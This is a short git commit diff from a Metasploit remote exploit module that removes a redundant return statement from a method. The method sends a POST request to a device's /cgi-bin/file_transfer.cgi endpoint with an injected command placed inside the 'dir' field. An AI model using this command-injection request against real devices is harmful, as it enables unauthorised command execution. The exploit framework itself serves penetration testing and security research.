Removed redundant return statement

This commit is contained in:
Jacob Baines
2020-01-14 06:52:24 -05:00
parent ecb825ea71
commit ea6263e6bb
@@ -67,13 +67,11 @@ class MetasploitModule < Msf::Exploit::Remote
dir: "'#{filter_bad_chars(cmd)}'"
}
resp = send_request_cgi({
send_request_cgi({
'uri' => '/cgi-bin/file_transfer.cgi',
'method' => 'POST',
'vars_post' => vars_post
}, timeout)
return resp
end
def check